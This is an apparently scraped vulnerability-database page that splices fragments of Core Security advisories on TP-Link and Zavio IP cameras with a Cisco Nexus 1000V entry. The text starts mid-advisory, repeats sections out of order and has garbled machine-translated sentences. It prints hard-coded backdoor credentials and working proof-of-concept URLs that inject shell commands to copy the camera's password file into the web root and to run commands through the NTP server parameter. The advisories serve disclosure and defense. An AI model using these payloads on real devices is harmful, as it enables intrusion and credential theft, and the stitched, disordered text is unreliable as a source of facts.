2013-05-21: Core tries to contact vendor for last time without any reply. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Command Injection vulnerability exists in the ap parameter to the /cgi-bin/mft/wireless_mft.cgi file in TP-Link IP Cameras TL-SC 3130, TL-SC 3130G, 3171G. and 4171G 1.6.18P12s, which could let a malicious user execute arbitrary code. plural TP-Link IP Camera Products include OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. TP-LINK IP Cameras are network camera products. A remote attacker can bypass the authentication by using a hard-coded username and password for the affected product (see CVE-2013-2572), and then use this command to inject the vulnerability to execute arbitrary commands from the administrator's web interface. *Advisory Information* Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Description* Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-2572] to bypass user web interface authentication using hard-coded credentials. 2. This flaw can also be used to obtain all credentials of registered users. 4. *Vulnerable Packages* . Tests and PoC were run on: . TL-SC 3130 [CVE-2013-2572] works with this device only . TL-SC 3130G . TL-SC 3171G . 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to patched firmware versions. This software is *beta*, TP-Link will release the final versions with release notes and some new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2572] TP-Link IP cameras use the Boa web server [1], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8. *Report Timeline* . 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30: TP-Link team asks for a report with technical information. 2013-05-02: Technical details sent to TP-Link. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th. 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed. 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will increase some new functions. 2013-05-28: Advisory CORE-2013-0318 published. 9. *References* [1] http://www.boa.org/. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 via the ap parameter to /cgi-bin/mft/wireless_mft.cgi, which could let a remote malicious user execute arbitrary code. Zavio IP The camera has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Zavio is an IP camera. This vulnerability can also be used to obtain credentials for all registered users. Zavio IP Cameras are prone to a remote arbitrary command-injection vulnerability. Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. *Advisory Information* Title: Zavio IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0302 Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: Zavio Release mode: User release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570 3. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials. 2. 3. [CVE-2013-2569] to access the camera video stream. 4. 4. *Vulnerable Packages* . 5. *Non-Vulnerable Packages* . Vendor did not provide details. Contact Zavio for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to Internet unless absolutely necessary. Enable RTSP authentication. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'. Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'. 7. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 8.2. *OS Command Injection* [CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569] The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting: /----- rtsp://192.168.1.100/video.h264 -----/ 8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570] The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey': /----- http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -----/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. 2013-05-09: Core asks for a reply. 2013-05-14: Core asks for a reply. 2013-05-21: Core tries to contact vendor for last time without any reply. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The encryption functionality in the Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication component in Cisco NX-OS on the Nexus 1000V does not properly authenticate VSM/VEM packets, which allows remote attackers to disable packet-level encryption and integrity protection via crafted packets, aka Bug ID CSCud14710. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. And integrity protection. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions on the affected device. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCud14710. The vulnerability is caused by the program not properly validating VSM/VEM packets